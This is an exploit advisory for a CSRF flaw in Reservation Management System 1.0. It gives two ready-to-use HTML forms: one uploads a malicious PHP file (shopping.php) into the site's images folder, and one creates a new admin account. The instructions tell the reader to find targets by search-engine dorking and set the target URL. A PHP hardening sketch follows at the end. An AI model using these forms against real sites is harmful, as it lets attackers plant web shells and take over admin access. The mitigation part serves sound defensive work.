| # Title : Reservation Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |
=============================================================================================================================================
poc :
[+] Dorking In Google Or Other Search Engine.
[+] The following HTML code uploads an executable malicious file remotely.
[+] Line 8 : Set your target url
[+] save payload as poc.html
[+] payload :
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New Menu</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Menu Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Category</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="cat" required="">
<option value="9">Dessert</option>
<option value="6">Main Course</option>
<option value="7">Pasta</option>
<option value="10">Rice</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Subcategory</label>
<div class="col-lg-8">
<select class="form-control select2" id="exampleSelect1" name="subcat">
<option>Drinks</option>
<option>Lunch and Dinner</option>
<option>Mirienda</option>
<option>Non Combo Meal</option>
</select>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Description</label>
<div class="col-lg-8">
<textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Price</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Image</label>
<div class="col-lg-8">
<input type="file" class="form-control" name="image" id="title">
</div>
</div>
<!-- Buttons -->
<div class="form-group">
<!-- Buttons -->
<div class="col-lg-offset-2 col-lg-6">
<button type="submit" class="btn btn-sm btn-primary">Save</button>
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</div>
</form>
<!--end form-->
</div>
</div>
[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php
-----------[+] Part 02 Add Admin [+]-------------------
[+] Line 8 : Set your target url
[+] save payload as poc.html
[+] payload :
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h4 class="modal-title">Add New User</h4>
</div>
<div class="modal-body">
<!--start form-->
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="title">Full Name</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="username">Username</label>
<div class="col-lg-8">
<input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">
</div>
</div>
<!-- Title -->
<div class="form-group">
<label class="control-label col-lg-2" for="password">Password</label>
<div class="col-lg-8">
<input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">
</div>
</div>
<!-- Buttons -->
<div class="form-group">
<!-- Buttons -->
<div class="col-lg-offset-2 col-lg-6">
<button type="submit" class="btn btn-sm btn-primary">Save</button>
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</div>
</form>
<!--end form-->
</div>
</div>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
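Mitigation sketch for the two handlers targeted above (added example, not code from the advisory or from the vendor): both forms post to admin/menu_save.php and admin/user_save.php with no token field, and the first leaves an uploaded .php file under images/. The helper names csrf_token(), csrf_require() and store_image() are hypothetical, and the sketch assumes each admin form also emits csrf_token() in a hidden field named csrf_token.

```php
<?php
declare(strict_types=1);
// Added hardening sketch; helper names are hypothetical, not the vendor's code.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

/** Return the per-session anti-CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Reject any state-changing request that does not carry the session's token. */
function csrf_require(): void
{
    $sent = $_POST['csrf_token'] ?? '';
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !is_string($sent)
        || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

/** Store an uploaded image under a server-chosen name; return that name or null. */
function store_image(array $file, string $destDir): ?string
{
    // Allowlist keyed by detected content type; the client-supplied file name is ignored.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    return move_uploaded_file($file['tmp_name'], "$destDir/$name") ? $name : null;
}

// Usage at the top of a handler such as menu_save.php or user_save.php:
//   csrf_require();
//   $image = store_image($_FILES['image'], __DIR__ . '/../images');
```

Because the stored extension comes from the detected content type rather than the uploaded name, a file submitted as shopping.php is either rejected or saved with an image extension; disabling script execution for the images directory in the web server configuration closes the remaining gap.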